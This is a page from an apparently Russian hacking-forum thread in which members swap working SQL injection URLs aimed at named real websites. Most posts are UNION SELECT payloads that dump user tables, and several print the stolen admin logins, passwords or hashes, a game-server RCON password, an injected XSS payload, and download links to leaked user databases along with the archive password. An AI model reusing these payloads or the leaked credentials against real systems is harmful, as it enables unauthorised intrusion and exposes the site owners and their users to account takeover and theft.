SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 28 of 798
  1. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://kacca.webdevelopment.us/index.php?iid=ViewPlace&id=-1+union+select+1,concat(email,0x3a,passwd),3,4,5,6,7+from+users+limit+0,1/*
    помогите найти таблицу админки
     
    #541 злюка, 19 Feb 2007
    1 person likes this.
  2. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    злюка таблица admins ;)
     
    #542 }{0TT@БЬ)Ч, 19 Feb 2007
  3. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    и че это?
     
    #543 }{0TT@БЬ)Ч, 19 Feb 2007
  4. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    в сорцы не глянул
     
    #544 }{0TT@БЬ)Ч, 19 Feb 2007
    1 person likes this.
  5. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.a2k.org.ua/index.php?topic=9&section=-1+union+select+concat(user,password)+from+users/*&lng=ru

    http://www.a2k.org.ua/admin/

    admin:repz
    ------------------------------------------------------------

    http://www.sevzapmebel.ru/index.php?area=hidden&level=-1+union+select+table_name+from+information_schema.tables+limit+14,1/*

    -------------------------------------------------------------

    http://www.btk.ru/index.php?category=-1+union+select+1111,222,3,'<script sql>alert(/_ANTICHAT_/)</script sql>',44,1+from+articles/*
     
    #545 *D1VER, 19 Feb 2007
    Last edited: 19 Feb 2007
    1 person likes this.
  6. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.bulgaria.by/rus/index.php?text_id=-99+union+select+concat(login,0x3a,pwd)+from+user+limit+0,1/*
    =\
     
    #546 ice1k, 19 Feb 2007
  7. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    www.skype-forum.com

    БД: __http://rapidshare.com/files/17283919/db_skype-forum.com.rar

    формат: email icq md5-hash (xls) 273kb in rar
    pass:a-chat
    количество записей :7217


    кстати кто не видел, в прошлый раз я выкладывал
    __http://rapidshare.com/files/15758988/base_forum_siemens-club_ru.rar
     
    #547 Thanat0z, 20 Feb 2007
    3 people like this.
  8. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    :)
     
    #548 kamaz, 20 Feb 2007
    2 people like this.
  9. blaga

    blaga Elder - Старейшина

    Joined:
    23 Mar 2006
    Messages:
    884
    Likes Received:
    273
    Reputations:
    106
    хе моя первая в этой теме. :)
     
    #549 blaga, 20 Feb 2007
    3 people like this.
  10. C[]R3

    C[]R3 Elder - Старейшина

    Joined:
    16 Jan 2007
    Messages:
    32
    Likes Received:
    6
    Reputations:
    0
    гыы, жжошь))

    вот я чё откопал
     
    #550 C[]R3, 20 Feb 2007
  11. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Code:
    __http://www.craftersforcritters.com/vendor.php?id=119+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,convert(user()+using+latin1),15/*
    что с этим можно сделать хз
    Code:
    __http://www.ogilvy.com/viewpoint/view_ko.php?id=42734'&iMagaId=9
    Code:
    __http://www.theracersgroup.com/shop/car.php?id=-19+union+select+1,2,3,4,5,6,7,8,user(),database(),version(),12,3,14,5,6,7,8,9,20,1,22,3,4,5,26,7,8,9,0,1,2,33,34,5,6/*
     
    #551 Thanat0z, 21 Feb 2007
    Last edited: 21 Feb 2007
    1 person likes this.
  12. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    :)
     
    #552 guest3297, 21 Feb 2007
    5 people like this.
  13. fod

    fod Member

    Joined:
    5 Feb 2007
    Messages:
    11
    Likes Received:
    5
    Reputations:
    10
    _http://kramer.ru/admin/includes/head.inc
     
    #553 fod, 21 Feb 2007
    1 person likes this.
  14. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://webz.priop.ru/index.php?categ=-628+union+select+1,2,3,4,5,6,7,8,9,10/* таблицы не охота перебирать))
     
    #554 }{0TT@БЬ)Ч, 21 Feb 2007
  15. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    Любютелям КС :)

    Code:
    http://cs.cyfra.ua/advstat.php?mode=admin
    Login:admin
    Pass:street

    RCON_PASSWORD, на все сервера Цуфры:

    Pass: rconpassword6

    А вобще вот :

    Цуфра:

    Code:
    http://cs.cyfra.ua/advstat.php?mode=playerinfo&player=47595&killLimit=1+union+select+concat_ws(CHAR(58),user(),database(),version()),2,3,4,5/*
    Ласки:

    Code:
    http://cs.lucky.net/hlstats/hlstats.php?mode=playerinfo&player=47595&killLimit=1+order+by+5/*
    Версия бд 3 (.

    Если надо, могу поискать Дампы vbios.com.
     
    #555 _-[A.M.D]HiM@S-_, 21 Feb 2007
    Last edited: 21 Feb 2007
    3 people like this.
  16. RaDDeaD

    RaDDeaD Elder - Старейшина

    Joined:
    28 Dec 2006
    Messages:
    44
    Likes Received:
    18
    Reputations:
    1
    Что ещё можно сделать на етом сайте ? Что мог попробовал, ничё не откопал кроме user() database()... ;)
     
    #556 RaDDeaD, 22 Feb 2007
  17. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    инет магазин

    интернет магазин.
    база просто super_super :D :D :D
     
    #557 big_BRAT, 22 Feb 2007
    1 person likes this.
  18. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.ofb.biz/article.pl?sid=-75+UNION+SELECT+1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17+from+users/*
    Username:cellularguy
    Password:a.CLuP.omGhUo
    Mail:[email protected]



    Code:
    http://www.orientation-lyon.org/choix/bts2007/detail.php?idd=658+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+from+orientationlyon_users/*
    Username:System Administrator
    Password:96da4c180c95beb563b797df331f4e8f

    не густо :(
     
    #558 n0ne, 22 Feb 2007
  19. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.whenhamstersattack.com/news.php?id=-99+union+select+1,2,3,4,5,6,7/*

    хех перебирать страшно..там такоооеее ;)
     
    #559 злюка, 22 Feb 2007
  20. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    www.Tetis-Pro.ru
    Code:
    http://www.tetis-pro.ru/?menu_id=&page_id=-1+union+select+1,2,login,pass,5,6,7,8,9+from+users+limit+0,1/*
    admin:xxx
    http://www.tetis-pro.ru/admin


    Code:
    http://www.iriscom.ru/index.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
     
    #560 InferNo23, 22 Feb 2007
(You must log in or sign up to post here.)
Page 28 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.